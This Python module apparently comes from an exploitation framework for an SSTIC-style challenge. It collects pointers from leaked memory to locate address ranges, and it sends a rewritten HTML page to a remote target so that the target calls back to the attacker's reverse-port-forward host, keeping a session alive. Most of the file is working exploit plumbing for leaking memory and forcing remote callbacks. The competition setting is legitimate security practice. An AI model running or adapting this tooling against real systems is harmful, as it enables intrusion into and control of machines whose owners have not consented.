from core.core05_persistent_model.policy.session import get_session
from core.core11_config.config import config_dependencies, Config
from core.core30_context.context import Context
from core.core30_context.context_dependency_graph import context_producer, context_dependencies

from action.utils.local_state import Store

from wussticcommon.model.remote_sstic_context import RemoteSSTICContext
from wussticcommon.model.reverse_port_forward import get_reverse_port_forward_manager
import wussticcommon.interact.target_choice

from ..model.read_query import ReadQuery
from ..model.read_query_answer import ReadQueryAnswer

import requests
import struct
import time


def u64(data):
    return struct.unpack('<Q', data)[0]


def p64(data):
    return struct.pack('<Q', data)


def u32(data):
    return struct.unpack('<I', data)[0]


def collect_addresses(data):
    collected = {}
    for i in range(0, len(data), 8):
        ptr = u64(data[i:i + 8])
        if ptr > 0x080000000000 and ptr < 0x1000000000000:
            collected.setdefault(ptr & 0xffffff000000, []).append(ptr)
    return collected


def gather_for_context(ctxt):
    all_answers = ReadQueryAnswer.query.join(ReadQuery).filter(ReadQuery.context_filter(ctxt)).all()
    sorted_addrs = list(sorted(all_answers, key=lambda x: x.read_query.address))

    full_content = b''
    for answer in sorted_addrs:
        full_content += answer.content
    return full_content


def gather_addresses_for_leak(content):
    collected_addresses = collect_addresses(content)

    sorted_per_addr_class = sorted(collected_addresses.items(), key=lambda x: -len(x[1]))
    for addr_class, addrs in sorted_per_addr_class:
        yield addr_class, list(sorted(addrs))


@context_producer(('.systemctxt.execution_context_id', str))
@config_dependencies(('.systemctxt.local_or_remote', bool))
def get_context(config: Config, ctxt: Context):
    if config['systemctxt']['local_or_remote']:
        from wussticcommon.ensure_service.local_instance import get_working_context_dyn as get_working_local
        context = get_working_local()
    else:
        from wussticcommon.ensure_service.instance_lifecycle import get_working_context_dyn as get_working_remote
        context = get_working_remote()
    ctxt.setdefault('systemctxt', {})['execution_context_id'] = context.instance_id
    return context


def get_public_url():
    with get_session():
        rpfm = get_reverse_port_forward_manager()
        return f"http://{rpfm.rpf.remote_ip}:{rpfm.rpf.remote_port}"


def ask_come_back(ctxt: RemoteSSTICContext):
    url = ctxt.url1
    content = open('index.html', 'r').read()
    content = content \
        .replace('mainLoop.js', 'mainLoop.js&' + ctxt.instance_id) \
        .replace('MAIN_URL', get_public_url())
    print(content)
    data = {
        'code': content
    }
    res = requests.post(url, json=data).text
    print(f"[/] Asked {url} and got: {res}")
    return res


@context_dependencies(('.state.store', Store))
@config_dependencies(('.systemctxt.local_or_remote', bool))
def get_confirmed_context(config: Config, ctxt: Context):
    if config['systemctxt']['local_or_remote']:
        return get_context()
    else:
        from wussticcommon.ensure_service.instance_lifecycle import get_working_context as get_working_remote

        def with_additional_check(remote_context: RemoteSSTICContext, noprint=False):
            store = ctxt['state']['store']
            # check if we got some ping from remote system
            if 'connection_time' not in store or not store['connection_time'] or \
                    store['connection_time'] + 100 < time.time():
                if not noprint:
                    print('[.] Time elapsed, may recreate remote session (either remote dead, or remote finished)')

                store['connection_time'] = time.time()
                if 'tried_at' in store and store['tried_at'] and store['tried_at'] + 10 < time.time():
                    # we fail, ask new context
                    return False
                else:
                    print("[.] Sending HTML to remote endpoint")
                    ask_come_back(remote_context)
                    store['tried_at'] = time.time()
                    return True
            # otherwise we got a recent connection, nothing to do
            return True

        context = get_working_remote(with_additional_check)
        with_additional_check(context, True)
        return context
